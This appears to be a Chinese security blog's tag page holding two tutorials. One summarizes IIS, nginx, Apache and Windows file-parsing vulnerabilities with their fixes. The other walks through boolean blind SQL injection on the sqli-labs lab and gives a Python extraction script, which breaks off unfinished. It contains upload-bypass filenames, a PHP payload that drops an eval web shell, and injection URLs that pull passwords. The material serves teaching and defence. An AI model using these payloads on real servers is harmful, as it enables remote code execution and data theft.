Tag:web安全

Tag (web安全)'s result:

解析漏洞总结

先上一张脑图 //图片来源于网络   0x00 IIS5.x~6.x解析漏洞 1.创建.asp/.asa名的目录,该目录下任意文件都被解析成asp 2.创建asp;.jpg形式的文件名,被解析成asp //还可以尝试上传asa/cer/cdx类型的文件,都会被解析成asp   修复方案: 1.升级 2.设置正则防止上传恶意文件名的文件   0x01 IIS7.0/7.5解析漏洞 在默认fast-CGI开启下,上传一个名字为xxx.jpg,内容为 <?PHP fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[cmd])?>’);?> 的文件,然后访问xxx.jpg/.php,在这个目录下就会生成一句话木马 shell.php 原理同0x02的nginx解析漏洞,都是php cgi的问题。   0x02 nginx<8.03解析漏洞 /1.jpg/1.php /1.jpg/.php /1.jpg/%20\0.php 原理: Fast-CGI开启 注: fix_pathinfo=1的作用 当php遇到不存在的文件路径如“/1.a/2.b/3.c”时,则会去掉最后的“/3.c”,然后判断“/1.a/2.b”是否存在,若存在,则把“/1.a/2.b”当做文件,若“/1.a/2.b”仍不存在,则继续去掉“/2.b”,直到存在。 Nginx遇到php后缀不判断文件存在与否就交给PHP处理(apache先判断文件存在与否) Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问www.xxx.com/test.jpg/xxx.php这个URL时,$fastcgi_script_name会被设置为“test.jpg/xxx.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI, 如果开启了fix_pathinfo这个选项,那么就会触发在PHP中的如下逻辑: PHP会认为SCRIPT_FILENAME是test.jpg,而xxx.php是PATH_INFO,所以就会将test.jpg作为PHP文件来解析了。 //高版本PHP有security.limit_extensions限制了解析后缀为.php 修复方案: 1. 升级 2. 禁止在上传文件目录下执行 php,在 nginx 虚拟机配置或者 fcgi.conf 配置加如下代码: if($request_filename~*(.*)\.php) { set$php_url$1; } if(!-e$php_url.php) { return403; } 3. fix_pathinfo=0   0x04 Nginx <8.03 空字节代码执行漏洞 /image/1.jpg%00.php Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码 影响版本: nginx 0.5.* nginx 0.6.* nginx 0.7 <= 0.7.65 nginx 0.8 <= 0.8.37   修复方案: 1.升级 2.禁止在上传文件目录下执行 php   0x05 apache解析漏洞 /xxx.php.php123.rar 原理: apache从右向左识别后缀进行解析,如果遇到不识别的后缀就继续往左识别直到遇到可以识别解析的后缀。 //不识别.rar //php3,php4,php5,pht,phtml也是可以被解析的 其余配置问题导致漏洞 (1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。 (2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。 修复方案 1.apache配置文件,禁止.php.这样的文件执行,配置文件里面加入 <Files ~ “.(php.|php3.)”> Order Allow,Deny Deny from all</Files> 2.用伪静态能解决这个问题,重写类似.php.*这类文件,打开apache的httpd.conf找到LoadModule rewrite_module modules/mod_rewrite.so 把#号去掉,重启apache,在网站根目录下建立.htaccess文件,代码如下: <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .(php.|php3.) /index.php RewriteRule .(pHp.|pHp3.) /index.php RewriteRule .(phP.|phP3.) /index.php RewriteRule .(Php.|Php3.) /index.php RewriteRule .(PHp.|PHp3.) /index.php RewriteRule .(PhP.|PhP3.) /index.php RewriteRule .(pHP.|pHP3.) /index.php RewriteRule .(PHP.|PHP3.) /index.php </IfModule> Apache 能够认识的文件在 mime.types 文件里: //图片来自信安之路   0x06 其他 在windows环境下,xxx.jpg[空格] 或xxx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单。 若上传成功,空格和点都会被windows自动消除,这样也可以getshell。 还有test.php:1.jpg test.php:: $DATA 如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入: <FilesMatch “xxx.jpg”> SetHandler application/x-httpd-php </FilesMatch> 然后再上传xxx.jpg的木马, 这样xxx.jpg就可解析为php文件。 或 写入: AddTypeapplication/x-httpd-phpxxx .xxx就当php解析了   0x07 参考资料 https://www.cnblogs.com/shellr00t/p/6426856.html https://www.secpulse.com/archives/3750.html https://www.cnblogs.com/zlgxzswjy/p/6561229.html blog.51cto.com/wt7315/1865580 https://blog.csdn.net/u011781521/article/details/58630742 byd.dropsec.xyz/2017/11/09/Nginx解析漏洞原理分析/ https://blog.werner.wiki/file-resolution-vulnerability-nginx/ https://mp.weixin.qq.com/s?src=11&timestamp=1534340722&ver=1062&signature=UxIGWuCiKbteqgs*-l63NTisI-*OvUo7bKewbQtZ980ERwqOLR6y8iYeER1kYO82mk32usgfpNDFVF4SC-*FVQmxVjxHvpLO4Y3pmviJn-YMCu2q1eI-FBlr2b*bsfvk&new=1    

sql盲注之布尔盲注

0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第二篇,介绍盲注中的布尔盲注。   0x01 布尔盲注原理 关注于sql语句是否执行成功,而页面只返回true或false。 主要函数: left(x,y): 获取x的前y位。 substr(x,y,z): 获取y的从x开始的z位。 ascii()/ord(): 得字符的ascii值。 length(): 返回字符串长度。 ……   0x02 测试 Sqli-labs: less-8 1.判断注入 192.168.101.225:8999/sqli-labs/Less-8/?id=1′ 返回false,不加’则返回true,由此判断为布尔盲注。 2. 猜解数据库名长度 192.168.101.225:8999/sqli-labs/Less-8/?id=1′ and length(database())=8–+ =8返回true则说明数据库长度为8,用二分法逐步缩小猜测范围。 3. 猜解数据库名 192.168.101.225:8999/sqli-labs/Less-8/?id=1′ and (ascii(substr(database(),1,1)))=115–+ =115返回true,说明数据库名第一个字符ascii值115,即s,同理用二分法猜解余下7位字符,把1,1改2,1即可猜第二位字符,结果为security。 4. 猜解security第一个表名 192.168.101.225:8999/sqli-labs/Less-8/?id=1′ and (ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)))=101–+ =101返回true,说明security库第一个表名第一个字符为e,同理猜解出余下字符,猜解第二个表名则把limit 0,1改limit 1,1即可。(判断表名是否结束可以用>0判断,如果大于0都false则表示这个/所有表名猜解完了) 5. 猜解users表的第一个列名: 192.168.101.225:8999/sqli-labs/Less-8/?id=1′ and (ascii(substr((select column_name from information_schema.columns where table_name=’users’ limit 0,1),1,1)))=105–+ 返回true,则说明第一个列名的第一个字符为i,同理猜解余下的所有列名,有id,username,password 6. 猜解数据 192.168.101.225:8999/sqli-labs/Less-8/?id=1′ and (ascii(substr((select password from users limit 0,1),1,1)))=68–+ =68返回true,说明第一个password数据的第一个字符是D,同理猜解余下的字符,为Dumb。   0x03 布尔盲注脚本 #coding:utf-8 #Author:LSA #Description:blind sqli boolean base script #Date:20171226 import requests import re import binascii import optparse import sys fdata = [] chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_’ def judge_vulnable(url): normal_rsp_length = requests.get(url).headers[‘content-length’] vuln_url = url + “‘” vuln_rsp_length = requests.get(vuln_url).headers[‘content-length’] if normal_rsp_length!=vuln_rsp_length: print ‘The url is vulnable!’ else: print ‘The url seems not vulnable’ def getDatabasesNum(url): for dbsNum in xrange(1,20): dbs_num_length_url = url + “‘ and (select length((select distinct table_schema from information_schema.tables limit {0},1)))>0–+” dbs_num_length_url_format = dbs_num_length_url.format(dbsNum) dbs_num_rsp_length = requests.get(dbs_num_length_url_format).headers[‘content-length’] if dbs_num_rsp_length == ‘722’: print ‘***Databases num is ‘ + str(dbsNum) + ‘***’ return dbsNum def getDatabases(url): databases = [] databasesNum = getDatabasesNum(url) for databaseIndex……